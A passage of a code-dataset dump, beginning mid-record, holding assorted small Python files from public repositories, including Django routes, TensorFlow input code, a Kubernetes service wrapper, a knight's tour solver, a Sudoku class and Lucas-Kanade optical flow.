inp()\n sorted_right_segments_list = sorted([segment[0] for segment in segments_list])\n sorted_left_segments_list = sorted([segment[1] for segment in segments_list])\n result = []\n for point in points_list:\n index_right = bisect.bisect_right(sorted_right_segments_list, point)\n index_left = bisect.bisect_left(sorted_left_segments_list, point)\n result.append(index_right - index_left)\n print(' '.join(map(str, result)))\n\n\nmain()\n","repo_name":"Timmi239/algorithms","sub_path":"stepic/6_d&c/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20107742502","text":"from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.urls import path\nfrom clinic import views\n\napp_name = \"clinic\"\nurlpatterns = [\n path(\"\",views.index,name=\"home\"),\n path(\"about/\",views.about,name=\"about\"),\n path(\"service/\",views.service,name=\"service\"),\n path(\"contact/\",views.contact,name=\"contact\"),\n path(\"pricing_plan/\",views.pricing_plan,name=\"pricing_plan\"),\n path(\"doctors/\",views.dentist,name=\"doctors\"),\n path(\"testimonial/\",views.testimonial,name=\"testimonial\"),\n path(\"appointment/\",views.appointment,name=\"appointment\"),\n path(\"appointment-page/\",views.appointment_page,name=\"appointment_page\"),\n path(\"doctors-search/\",views.search,name=\"search\"),\n 
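# The quick_sort.py record above answers each query with two binary searches:
# a point p is covered by |{left endpoints <= p}| - |{right endpoints < p}|.
# A minimal standalone check of that identity (illustrative data, not taken
# from the record):
import bisect

segments = [(0, 5), (3, 8), (7, 10)]
starts = sorted(l for l, r in segments)  # [0, 3, 7]
ends = sorted(r for l, r in segments)    # [5, 8, 10]

for p in (1, 4, 6, 11):
    fast = bisect.bisect_right(starts, p) - bisect.bisect_left(ends, p)
    brute = sum(l <= p <= r for l, r in segments)
    assert fast == brute
    print(p, fast)  # 1 1, 4 2, 6 1, 11 0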
path(\"contact_us/\",views.contact_us,name=\"contact_us\"),\n\n]","repo_name":"3ina/dental_clinic_app","sub_path":"clinic/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"16591162068","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport argparse\nimport sys\nimport tensorflow as tf\n\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\n\ndef read_and_decode(filename_queue, img_size):\n \"\"\"\n Function to read and decode the tfrecord file of the dataset\n Arg:\n filename_queue: list of the tfrecord files\n img_size: size (height/width) of the images (square aspect\n ratio)\n\n Returns:\n image, label: images and corresponding labels from the dataset\n \"\"\"\n # Define a reader and read the next record\n reader = tf.TFRecordReader()\n _, serialized_example = reader.read(filename_queue)\n\n # Decode the record read by the reader\n feature = {'image_raw': tf.FixedLenFeature([], tf.string),\n 'label': tf.FixedLenFeature([], tf.int64)}\n features = tf.parse_single_example(serialized_example, features=feature)\n\n # Convert the image data from string back to the numbers\n image = tf.decode_raw(features['image_raw'], tf.float32)\n\n # Set the shape of the images\n image = tf.reshape(image, [img_size, img_size, 3])\n\n # Convert to between [-0.5, 0.5)\n image = image * (1.0 / 255) - 0.5\n\n # Convert label to an int32 scalar.\n label = tf.cast(features['label'], tf.int32)\n\n return image, label\n\ndef inputs(filename, batch_size, img_size):\n \"\"\"\n Function to\n Arg:\n filename: path to the tfrecord\n batch_size: size of the batch\n num_epochs: number of epochs/iterations\n img_size: size\n\n Returns:\n images, labels: images and labels for the batch\n \"\"\"\n with tf.name_scope('input'):\n # Create a list of filenames and pass it to a queue\n filename_queue = tf.train.string_input_producer([filename],\n num_epochs=2)\n\n image, label = read_and_decode(filename_queue, img_size)\n\n # Creates batches\n images, labels = tf.train.batch([image, label],\n batch_size=batch_size,\n capacity=100 + 3*batch_size,\n allow_smaller_final_batch=True,\n num_threads=2)\n\n return images, labels\n\n\ndef main(_):\n images, labels = inputs(filename=FLAGS.test_path,\n batch_size=FLAGS.batch_size,\n img_size=FLAGS.img_size)\n\n with tf.Session() as sess:\n # Initialize all global and local variables\n init_op = tf.group(tf.global_variables_initializer(),\n tf.local_variables_initializer())\n sess.run(init_op)\n\n tf.train.import_meta_graph('my-model.meta')\n \n\n # Coordinator\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess,\n coord=coord)\n try:\n while not coord.should_stop():\n label = sess.run(labels)\n print(len(label))\n except tf.errors.OutOfRangeError:\n print(\"end\")\n finally:\n coord.request_stop()\n\n coord.join(threads)\n sess.close()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--num_classes',\n type=int,\n default=14,\n help='Number of classes for the dataset.'\n )\n parser.add_argument(\n '--img_size',\n type=int,\n default=64,\n help='Size of the image to be fed to the model.'\n )\n parser.add_argument(\n '--batch_size',\n type=int,\n default=100,\n help='Batch size.'\n )\n parser.add_argument(\n '--test_path',\n type=str,\n default='tfrecord/test.tfrecords',\n help='Path to the test data (tfrecords 
file).'\n )\n parser.add_argument(\n '--checkpoint_dir',\n type=str,\n default='ckpt',\n help='Directory for load the model checkpoints.'\n )\n\n FLAGS, unparsed = parser.parse_known_args()\n tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)\n\n","repo_name":"alvinlee90/Robotics-Vanilla-CNN","sub_path":"evaluate_model.py","file_name":"evaluate_model.py","file_ext":"py","file_size_in_byte":4187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29122691151","text":"from code_names_bot_dictionary_compiler.download.caches import WikiPageViewCache\nfrom code_names_bot_dictionary_compiler.download.api_downloader import download\nfrom config import WIKI_FILTERED_2, MISSING_WIKI_PAGE_VIEWS\n\nfrom urllib.parse import quote_plus\n\nGET_URL = (\n lambda page_title: f\"https://wikimedia.org/api/rest_v1/metrics/pageviews/per-article/en.wikipedia/all-access/user/{quote_plus(page_title)}/monthly/2021010100/2021123100\"\n)\n\n\ndef get_request_params(page_title):\n return {\n \"url\": GET_URL(page_title),\n \"headers\": {\n \"User-Agent\": \"CodeNamesBot/0.0 (nalu.zou@gmail.com) python-requests/0.0\"\n },\n }\n\n\ndef process_result(key, result):\n if result.status_code == 404:\n print(\"Not found\", key)\n with open(MISSING_WIKI_PAGE_VIEWS, \"a\") as file:\n file.write(key + \"\\n\")\n return None, True\n\n if result.status_code != 200:\n print(\"Invalid status code\", key, result.text)\n return None, False\n\n json = result.json()\n monthly_views = [item[\"views\"] for item in json[\"items\"]]\n return sum(monthly_views), True\n\n\ndef main():\n with open(WIKI_FILTERED_2, \"r\") as file:\n page_id_titles = file.read().splitlines()\n page_id_titles = map(\n lambda page_id_title: page_id_title.split(\"\\t\"), page_id_titles\n )\n page_titles = list(map(lambda page_id_title: page_id_title[1], page_id_titles))\n\n with open(MISSING_WIKI_PAGE_VIEWS, \"r\") as file:\n missing_page_views = set(file.read().splitlines())\n\n page_titles = list(\n filter(lambda page_title: page_title not in missing_page_views, page_titles)\n )\n\n download(\n keys=page_titles,\n get_request_params=get_request_params,\n cache=WikiPageViewCache(),\n process_result=process_result,\n chunk_size=20,\n download_rate=1.5,\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AdeptLearner123/code-names-bot-dictionary-compiler-old","sub_path":"code_names_bot_dictionary_compiler/wiki_filter_3/download_api_wiki_page_views.py","file_name":"download_api_wiki_page_views.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42089303620","text":"__author__ = \"Sumit Sharma\"\n__copyright__ = \"Copyright 2022, Luna2 Project [OOD]\"\n__license__ = \"GPL\"\n__version__ = \"2.0\"\n__maintainer__ = \"Sumit Sharma\"\n__email__ = \"sumit.sharma@clustervision.com\"\n__status__ = \"Development\"\n\nINI_FILE = '/trinity/local/ondemand/3.0/config/luna.ini'\nLICENSE = '/trinity/local/ondemand/3.0/LICENSE.txt'\nLOG_DIR = '/var/log/luna'\nLOG_FILE = '/var/log/luna/luna2-web.log'\nEDITOR_KEYS = ['options', 'content', 'comment', 'prescript', 'partscript', 'postscript']\n\n\ndef filter_columns(table=None):\n \"\"\"\n This method remove the unnecessary fields from\n the dataset.\n \"\"\"\n response = False\n static = {\n 'node': ['name', 'group', 'osimage', 'osimagetag', 'setupbmc', 'bmcsetup', 'status', 'tpm_uuid'],\n 'nodeinterface': ['interface', 'ipaddress', 'macaddress', 'network', 
'options'],\n 'nodesecrets': ['Node', 'name', 'path', 'content']\n }\n response = list(static[table])\n return response\n\n\ndef sortby(table=None):\n \"\"\"\n This method remove the unnecessary fields from\n the dataset.\n \"\"\"\n response = False\n static = {\n 'node': [\n 'name', 'hostname', 'group', 'osimage', 'osimagetag', 'interfaces', 'status', 'vendor', 'assettag',\n 'position', 'switch', 'switchport', 'setupbmc', 'bmcsetup', 'unmanaged_bmc_users', 'netboot',\n 'localinstall', 'bootmenu', 'roles', 'service', 'prescript', 'partscript',\n 'postscript','provision_interface', 'provision_method', 'provision_fallback',\n 'tpm_uuid', 'tpm_pubkey', 'tpm_sha256', 'comment', 'macaddress'\n ],\n 'nodeinterface': ['interface', 'ipaddress', 'macaddress', 'network'],\n 'nodesecrets': ['Node', 'name', 'path', 'content']\n }\n response = list(static[table])\n return response\n","repo_name":"clustervision/trinityx-ood","sub_path":"node/constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8879077254","text":"# Given an integer N, print a possible solution to the knights tour problem.\n\n# Input : \n# N = 8\n# Output:\n# 0 59 38 33 30 17 8 63\n# 37 34 31 60 9 62 29 16\n# 58 1 36 39 32 27 18 7\n# 35 48 41 26 61 10 15 28\n# 42 57 2 49 40 23 6 19\n# 47 50 45 54 25 20 11 14\n# 56 43 52 3 22 13 24 5\n# 51 46 55 44 53 4 21 12\n\nfrom array import array\n\n\ndef print_matrix(matrix)->None:\n # Print the matrix\n for i in range(len(matrix)):\n for j in range(len(matrix)):\n print(matrix[i][j],end=\" \")\n print()\ndef solve(N):\n if N%2 != 0:\n print(\"No solution\")\n return None\n if N in [1,2,4]:\n print(\"No solution\")\n return None\n board = [[0 for i in range(N)] for j in range(N)]\n # Try diferent starting points\n for i in range(N):\n for j in range(N):\n # Warnsdorff’s algorithm\n # 1. Find the position with the fewest number of possible moves\n # 2. Move to that position\n # 3. Repeat until all squares are visited\n # 4. If no more moves are possible, backtrack\n # 5. 
If all squares are visited, stop\n if wandorff(board,i,j,0):\n return board\n return None\nrow = [-2,-1,1,2,2,1,-1,-2]\ncol = [1,2,2,1,-1,-2,-2,-1]\ndef wandorff(board,i,j,move):\n # Check if the move is valid\n if i < 0 or i >= len(board) or j < 0 or j >= len(board) or board[i][j] != 0:\n return False\n # If the move is valid, make the move\n board[i][j] = move\n # If all the moves are done, the tour is complete\n if move == len(board)**2-1:\n return True\n # Try all the possible moves\n for k in range(8):\n if wandorff(board,i+row[k],j+col[k],move+1):\n return True\n # If no move is possible, backtrack\n board[i][j] = 0\n return False\n\nif __name__ == \"__main__\":\n N = int(input())\n board = solve(N)\n if board:\n print_matrix(board)","repo_name":"GuillermoTafoya/AlgoToolboxSolutions","sub_path":"Advanced Algos - ITESM/The Knights Tour/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8796838733","text":"def intercala_vetores(a, b, c, tam1, tam2):\n # Receives: vectors a, b and c, with tam1 and tam2 elements, respectively.\n # Action: builds c by merging the elements of a and b.\n # Returns: the number of elements copied into c.\n # Notes:\n # (a) a and b are already sorted;\n # (b) a and b, individually, contain no repeated elements;\n # (c) merge a and b into c in sorted order;\n # (d) c must not contain repeated elements;\n # (e) tam3 is at most tam1 + tam2, and may turn out smaller.\n cont1 = 0\n cont2 = 0\n cont3 = 0\n while cont1 < tam1 or cont2 < tam2:\n if cont1 == tam1:\n c[cont3] = b[cont2]\n cont3 = cont3+1\n cont2 = cont2+1\n elif cont2 == tam2:\n c[cont3] = a[cont1]\n cont3 = cont3+1\n cont1 = cont1+1\n else:\n if a[cont1] < b[cont2]:\n c[cont3] = a[cont1]\n cont1 = cont1+1\n cont3 = cont3+1\n elif b[cont2] < a[cont1]:\n c[cont3] = b[cont2]\n cont2 = cont2+1\n cont3 = cont3+1\n else:\n c[cont3] = a[cont1]\n cont1 = cont1+1\n cont2 = cont2+1\n cont3 = cont3+1\n return cont3\n","repo_name":"neveSZ/fatecsp-ads","sub_path":"IAL-002/Listas/5-Listas Homogêneas/1-Vetores/Lista 01/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"pt","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"33898853400","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 19 22:44:58 2020\n\n@author: joaom\n\"\"\"\nimport numpy as np\nimport SudokuSolver as Ss\nimport SudokuGUI\nfrom sqlitedict import SqliteDict\nfrom tkinter import Tk\nimport os.path\n\n\nclass Sudoku:\n \n def __init__(self, puzzle_number=1, user_name=\"User\"):\n self.user = self.login_user(user_name)\n self.game_over = False\n self.sudoku_id = puzzle_number\n # Chosen sudoku's state\n self.start_state = np.array(self.get_from_db(user_name + \".sqlite\", \"puzzles\", puzzle_number))\n self.state = np.copy(self.start_state)\n # Chosen sudoku's solution\n self.solution = np.array(self.get_from_db(user_name + \".sqlite\", \"solutions\", puzzle_number))\n # self.run_ui()\n \n def __str__(self, sdk=()):\n # String representation of the sudoku state\n if len(sdk) == 0:\n sdk = self.state\n length = len(sdk)\n sudoku_size = int(length**0.5)\n string = ''\n # Horizontal separator\n line = ''\n for i in range(length*3-sudoku_size+1):\n line += '-'\n line += '\\n'\n string += line\n # Fill each line\n for r in range(length):\n string += '|'\n for c in range(length):\n if sdk[r, c] == 0:\n string += ' '\n else:\n string += str(sdk[r, c])\n if (c+1) % 
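# The comment block in the knight's-tour record names Warnsdorff's rule, but
# wandorff() itself is exhaustive backtracking. For contrast, a minimal sketch
# of the heuristic proper: always jump to the unvisited square with the fewest
# onward moves. Standalone and illustrative (warnsdorff_tour and degree are
# not names from the record), and the greedy version can occasionally
# dead-end instead of backtracking.
MOVES = [(-2, -1), (-2, 1), (-1, -2), (-1, 2), (1, -2), (1, 2), (2, -1), (2, 1)]

def warnsdorff_tour(n, start=(0, 0)):
    board = [[-1] * n for _ in range(n)]
    x, y = start
    board[x][y] = 0

    def degree(cx, cy):
        # Count unvisited squares reachable from (cx, cy).
        return sum(1 for mx, my in MOVES
                   if 0 <= cx + mx < n and 0 <= cy + my < n
                   and board[cx + mx][cy + my] == -1)

    for move in range(1, n * n):
        candidates = [(x + mx, y + my) for mx, my in MOVES
                      if 0 <= x + mx < n and 0 <= y + my < n
                      and board[x + mx][y + my] == -1]
        if not candidates:
            return None  # greedy choice got stuck
        x, y = min(candidates, key=lambda c: degree(*c))
        board[x][y] = move
    return board

tour = warnsdorff_tour(8)
if tour:
    print('\n'.join(' '.join(f'{v:2d}' for v in row) for row in tour))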
sudoku_size == 0:\n string += '|'\n else:\n string += ' '\n string += '\\n'\n if (r+1) % sudoku_size == 0:\n string += line\n return string\n\n def change_sudoku(self, num: int) -> None:\n # Choose another sudoku\n # Chosen sudoku\n self.sudoku_id = num\n # Chosen sudoku's state\n self.state = np.array(self.get_from_db(self.user + \".sqlite\", \"puzzles\", self.sudoku_id))\n # Chosen sudoku's solution\n self.solution = np.array(self.get_from_db(self.user + \".sqlite\", \"solutions\", self.sudoku_id))\n \n def check_solution(self) -> bool:\n # Check solution's correctness\n if np.all(self.state == self.solution):\n return True\n return False\n\n def compute_solution(self) -> int:\n # Computes solution to given sudoku\n solver = Ss.SudokuSolver(self)\n solution = solver.solve()\n if not solution:\n return -1\n return self.save_to_db(self.user + \".sqlite\", \"solutions\", solution)\n\n def create_new_user(self, user_name: str) -> None:\n # Add new user to DB\n db_name = user_name + \".sqlite\"\n self.import_default_files(db_name)\n\n def draw_sudoku(self, solved=False) -> None:\n # Prints a legible form of sudoku to console\n if solved:\n print(Sudoku.__str__(self.solution))\n else:\n print(Sudoku.__str__(self))\n\n @staticmethod\n def get_from_db(db_name: str, table_name: str, sudoku_number: int) -> tuple:\n # Retrieve specified data from selected DB\n with SqliteDict(db_name, tablename=table_name, autocommit=True) as db:\n return db[table_name].get(sudoku_number, None)\n\n @staticmethod\n def import_data(db_name: str, file_name: str, table_name: str) -> None:\n # Imports data from file to SqliteDict DB\n temp_dict = dict()\n with open(file_name, \"r\") as f:\n for line in f:\n args = line.split(\": \")\n temp_dict.update({eval(args[0]): eval(args[1])})\n with SqliteDict(db_name, tablename=table_name, autocommit=True) as db:\n db[table_name] = temp_dict\n\n def import_default_files(self, db: str) -> None:\n # Imports the base puzzles and solutions for the creation of a new user\n self.import_data(db, \"puzzles.txt\", \"puzzles\")\n self.import_data(db, \"solutions.txt\", \"solutions\")\n\n def login_user(self, user_name: str) -> str:\n # Initialize user account with files from DB\n path = \"./Users.txt\"\n if os.path.isfile(path):\n with open(\"Users.txt\", \"r\") as f:\n for line in f:\n if line == user_name:\n return user_name # User exists\n self.create_new_user(user_name)\n with open(\"Users.txt\", \"a\") as f:\n f.write(user_name)\n return user_name\n\n def new_puzzle(self, board: np.array) -> None:\n # Get new puzzle\n self.start_state = board\n self.state = np.copy(self.start_state)\n solved_flg = self.compute_solution()\n if solved_flg == -1:\n print(\"WARNING: Could not compute solution to the puzzle! 
\\n\\t\\tPlease check the board's validity.\")\n self.start_state = np.array(self.get_from_db(self.user + \".sqlite\", \"puzzles\", self.sudoku_id))\n self.state = np.copy(self.start_state)\n else:\n puzzle_number = self.save_to_db(self.user + \".sqlite\", \"puzzles\", board)\n self.reset_sudoku()\n self.sudoku_id = puzzle_number\n\n def reset_sudoku(self) -> None:\n # Reset game state\n self.state = np.copy(self.start_state)\n self.game_over = False\n\n def run_ui(self):\n # Start the Sudoku UI\n root = Tk()\n SudokuGUI.SudokuUI(root, self)\n root.mainloop()\n\n @staticmethod\n def save_to_db(db_name: str, table_name: str, sudoku: tuple) -> int:\n # Save given sudoku state to selected DB\n with SqliteDict(db_name, tablename=table_name, autocommit=True) as db:\n temp_dict = db[table_name]\n temp_dict.update({len(db[table_name]) + 1: tuple(map(tuple, sudoku))})\n db[table_name] = temp_dict\n return len(db[table_name]) + 1\n","repo_name":"jogirao/sudoku","sub_path":"Sudoku.py","file_name":"Sudoku.py","file_ext":"py","file_size_in_byte":5779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"10565618557","text":"import random\n\nimport numpy as np\nfrom scipy.signal import convolve2d\n\nimport cv2 as cv\n\nfrom math import exp, ceil\n\n\ndef gaussian2d(x, y, x_0=0, y_0=0, sigma_x=1, sigma_y=1, amp=1):\n return amp * exp(-((x - x_0) ** 2 / (2 * sigma_x ** 2) + (y - y_0) ** 2 / (2 * sigma_y ** 2)))\n\n\ndef identity_func(x, y, x_0=0, y_0=0):\n return 1\n\n\ndef rgb2gs(img):\n return np.dot(img[..., :3], [0.2125, 0.7154, 0.0721])\n\n\ndef img_offset(val, step, max_val):\n offset = max_val - val\n return offset if offset < step else 0\n\n\ndef img_block(img, partirion=(1, 1)):\n block_w, block_h = img.shape[1] // partirion[1], img.shape[0] // partirion[0]\n prev_y, prev_x = 0, 0\n cur_y, cur_x = 0, 0\n while (cur_y, cur_x) != img.shape:\n cur_y, cur_x = prev_y + block_h, prev_x + block_w\n cur_x += img_offset(cur_x, block_w, img.shape[1])\n cur_y += img_offset(cur_y, block_h, img.shape[0])\n if cur_x > img.shape[1]:\n cur_x %= img.shape[1]\n cur_y += block_h\n yield img[prev_y:cur_y, prev_x:cur_x]\n prev_x = cur_x\n if prev_x >= img.shape[1]:\n prev_x %= img.shape[1]\n prev_y += block_h\n\n\ndef img_block_pixelvice(img, block_shape=(5, 5)):\n rows, cols = img.shape\n block_rows, block_cols = block_shape\n col_parts = ceil(cols / block_cols)\n row_parts = ceil(rows / block_rows)\n for row in range(row_parts):\n for col in range(col_parts):\n diff_row, diff_col = block_rows, block_cols\n if (row + 1) * block_rows >= rows:\n diff_row = rows - row * block_rows\n if (col + 1) * block_cols >= cols:\n diff_col = cols - col * block_cols\n yield img[row * block_rows:row * block_rows + diff_row, col * block_cols:col * block_cols + diff_col]\n\n\n# TODO: weight function\ndef bias(left_top, right_bottom, deriv_x, deriv_y, deriv_t, weight_func=gaussian2d):\n\n bias_v = [0, 0]\n for row in range(left_top[0], right_bottom[0] + 1):\n for col in range(left_top[1], right_bottom[1] + 1):\n k = deriv_t[row, col] # * weight_func(row, col, offset_row, offset_col)\n bias_v[0] += k * deriv_x[row, col]\n bias_v[1] += k * deriv_y[row, col]\n return [-x for x in bias_v]\n\n\n# TODO: weight function\ndef coeff_matrix(left_top, right_bottom, deriv_x, deriv_y, weight_func):\n mat = np.zeros((2, 2))\n # print(right_bottom)\n # mat[0, 0] = np.sum((deriv_x[left_top[0]:right_bottom[0] + 1,\n # left_top[1]:right_bottom[1] + 1]) ** 2)\n # mat[0, 1] = mat[1, 0] = 
np.sum((deriv_y[left_top[0]:right_bottom[0] + 1,\n # left_top[1]:right_bottom[1] + 1]) *\n # (deriv_x[left_top[0]:right_bottom[0] + 1,\n # left_top[1]:right_bottom[1] + 1])\n # )\n #\n # mat[1, 1] = np.sum((deriv_y[left_top[0]:right_bottom[0] + 1,\n # left_top[1]:right_bottom[1] + 1]) ** 2)\n for row in range(left_top[0], right_bottom[0] + 1):\n for col in range(left_top[1], right_bottom[1] + 1):\n xy_deriv_product = deriv_x[row, col] * deriv_y[row, col]\n mat[0, 0] += deriv_x[row, col] ** 2\n mat[0, 1] += xy_deriv_product\n mat[1, 0] += xy_deriv_product\n mat[1, 1] += deriv_y[row, col] ** 2\n return mat\n\n\ndef merge_imgs(imgs):\n imgs_num = len(imgs)\n w, h = imgs[0].shape[1], imgs[0].shape[0]\n img = np.zeros((h, w * imgs_num))\n for index, cur_img in enumerate(imgs):\n img[0:h, w * index:w * (index + 1)] = cur_img\n return img\n\n\ndef LucasKanade(img_cur, img_next, features):\n Gt1 = np.reshape(np.asarray([[-1, -1], [-1, -1]]), (2, 2)) # for 1st image\n Gt2 = np.reshape(np.asarray([[1, 1], [1, 1]]), (2, 2)) # for 2nd image\n\n BLOCK_SHAPE_ROW = 5\n BLOCK_SHAPE_COL = 5\n\n sigma, ev_min, bias_prec = 1, 0.05, 2\n\n num_rows, num_cols = img_cur.shape\n\n Gx = np.reshape(np.asarray([[-1, 1], [-1, 1]]), (2, 2)) # for image 1 and image 2 in x direction\n Gy = np.reshape(np.asarray([[-1, -1], [1, 1]]), (2, 2)) # for image 1 and image 2 in y direction\n\n MAX_LEVEL = 4\n image0_pyramid = []\n image1_pyramid = []\n img1 = img_cur\n img2 = img_next\n\n for i in range(MAX_LEVEL):\n image0_pyramid.append(img1)\n image1_pyramid.append(img2)\n img1 = cv.pyrDown(img1)\n img2 = cv.pyrDown(img2)\n\n image0_pyramid = image0_pyramid[::-1]\n image1_pyramid = image1_pyramid[::-1]\n # u = np.zeros(shape=(image0_pyramid[0].shape[0] // 2, image0_pyramid[0].shape[1] // 2))\n #\n # v = np.zeros(shape=(image1_pyramid[0].shape[0] // 2, image1_pyramid[0].shape[1] // 2))\n\n initial_tracking_blocks = np.copy(features)\n # tracking_blocks = features // (2 ** MAX_LEVEL)\n tracking_blocks = features // 1\n g = np.zeros(shape=tracking_blocks.shape)\n # print(g)\n for img_cur, img_next in zip(image0_pyramid, image1_pyramid):\n\n # u = np.round(cv.pyrUp(u))\n # v = np.round(cv.pyrUp(v))\n\n deriv_x = (convolve2d(img_cur, Gx) + convolve2d(img_next, Gx)) / 2\n\n deriv_y = (convolve2d(img_cur, Gy) + convolve2d(img_next, Gy)) / 2\n\n deriv_t = convolve2d(img_cur, Gt1) + convolve2d(img_next, Gt2)\n\n for index, block in enumerate(tracking_blocks):\n\n col, row = block\n\n left_top = (row - BLOCK_SHAPE_ROW if row >= BLOCK_SHAPE_ROW else 0,\n col - BLOCK_SHAPE_COL if col >= BLOCK_SHAPE_COL else 0)\n right_bottom = (row + BLOCK_SHAPE_ROW + 1 if row + BLOCK_SHAPE_ROW + 1 < num_rows else num_rows - 1,\n col + BLOCK_SHAPE_COL + 1 if col + BLOCK_SHAPE_COL + 1 < num_cols else num_cols - 1)\n try:\n b = bias(left_top, right_bottom, deriv_x, deriv_y, deriv_t, gaussian2d)\n M = coeff_matrix(left_top, right_bottom, deriv_x, deriv_y, gaussian2d)\n\n\n except:\n continue\n\n min_ev = min(np.linalg.eigvals(M))\n if min_ev >= ev_min:\n result = np.matmul(np.linalg.pinv(M), b) / 2\n # u[row, col] += result[0]\n # v[row, col] += result[1]\n # tracking_blocks[index] = np.array([col + u[row, col], row + v[row, col]])\n # print(result)\n g[index] += result\n\n # tracking_blocks = np.round(tracking_blocks) * 2\n\n return initial_tracking_blocks, tracking_blocks + 
np.int32(g)\n","repo_name":"sMaxym/LucasKanade","sub_path":"py/pyramidal_lk_optical_flow.py","file_name":"pyramidal_lk_optical_flow.py","file_ext":"py","file_size_in_byte":6536,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"22684547379","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 4 16:15:19 2017\n\n@author: sampathduddu\n\"\"\"\n\n#kmeans clustering\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\ndataset = pd.read_csv('curveball.csv')\n\n\n\ndataset_orig = dataset.iloc[:,:20]\ndataset = dataset_orig.iloc[:,6:]\n\nX = dataset.values\n \n\n\n# Find optimal number of clusters using elbow method\nfrom sklearn.cluster import KMeans\nwcss = []\nfor i in range(1, 21):\n kmeans = KMeans(n_clusters=i, random_state=0)\n kmeans.fit(X)\n wcss.append(kmeans.inertia_)\n\nplt.plot(range(1,21), wcss)\nplt.show()\n\n#Applying kmeans to the data set with the correct number of clusters\nkmeans = KMeans(n_clusters=5, random_state=0)\ny_kmeans = kmeans.fit_predict(X)\n\n\n\n# Visualizing the clusters\n#plt.scatter(X[y_kmeans == 0, 0],X[y_kmeans == 0, 1], s=100, c ='red', label = 'Cluster 1')\n#plt.scatter(X[y_kmeans == 1, 0],X[y_kmeans == 1, 1], s=100, c ='blue', label = 'Cluster 2')\n#plt.scatter(X[y_kmeans == 2, 0],X[y_kmeans == 2, 1], s=100, c ='green', label = 'Cluster 3')\n#plt.scatter(X[y_kmeans == 3, 0],X[y_kmeans == 3, 1], s=100, c ='orange', label = 'Cluster 4')\n#plt.scatter(X[y_kmeans == 4, 0],X[y_kmeans == 4, 1], s=100, c ='yellow', label = 'Cluster 5')\n#plt.scatter(kmeans.cluster_centers_[:,0], kmeans.cluster_centers_[:,1], s=300, c='brown', label='Centroids')\n#plt.show()\n \n ","repo_name":"dudduss/udemyMLCourse","sub_path":"Machine Learning A-Z Template Folder/Part 4 - Clustering/Section 24 - K-Means Clustering/kmeans_clustering.py","file_name":"kmeans_clustering.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5939294777","text":"from beecell.types.type_dict import dict_get\nfrom beecell.types.type_string import truncate\nfrom beedrones.k8s.client import k8sEntity, api_request\n\n\nclass K8sService(k8sEntity):\n \"\"\"K8sService\n \"\"\"\n @property\n def api(self):\n return self.manager.core_api\n\n @api_request\n def list(self, name=None):\n \"\"\"list services in a namespace or in all the namespaces\n\n :param name: service partial name\n :return: list of services\n \"\"\"\n if self.all_namespaces is True:\n services = self.api.list_service_for_all_namespaces()\n else:\n services = self.api.list_namespaced_service(self.default_namespace)\n\n res = services.to_dict().get('items', [])\n\n # filter services\n res = [s for s in res if name is None or (name is not None and dict_get(s, 'metadata.name').find(name) >= 0)]\n\n for i in res:\n i['metadata']['creation_timestamp'] = str(i['metadata']['creation_timestamp'])\n\n self.logger.debug('list services: %s' % truncate(res))\n return res\n\n @api_request\n def get(self, name):\n \"\"\"get service\n\n :param name: name of the service\n :return:\n \"\"\"\n service = self.api.read_namespaced_service(name, self.default_namespace)\n res = self.get_dict(service)\n self.logger.debug('get namespace %s service: %s' % (self.default_namespace, truncate(res)))\n return res\n\n @api_request\n def add(self, name, selector, port, target_port):\n \"\"\"add service\n\n :param name: service name\n :param selector: service 
selector. Ex. {'app': 'deployment'}\n :param port: service port\n :param target_port: service target port\n :return: service\n \"\"\"\n body = self.client.V1Service(\n api_version='v1',\n kind='Service',\n metadata=self.client.V1ObjectMeta(\n name=name\n ),\n spec=self.client.V1ServiceSpec(\n selector=selector,\n ports=[self.client.V1ServicePort(\n port=port,\n target_port=target_port\n )]\n )\n )\n res = self.api.create_namespaced_service(namespace=self.default_namespace, body=body)\n self.logger.debug('create namespace %s service: %s' % (self.default_namespace, truncate(res)))\n return res\n\n @api_request\n def delete(self, name):\n \"\"\"delete service\n\n :param name: service name\n \"\"\"\n namespace = self.default_namespace\n res = self.api.delete_namespaced_service(name, namespace)\n self.logger.debug('delete namespace %s service: %s' % (self.default_namespace, truncate(res)))\n return res\n","repo_name":"Nivola/beedrones","sub_path":"beedrones/k8s/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20193053157","text":"'''\nCreated on 13 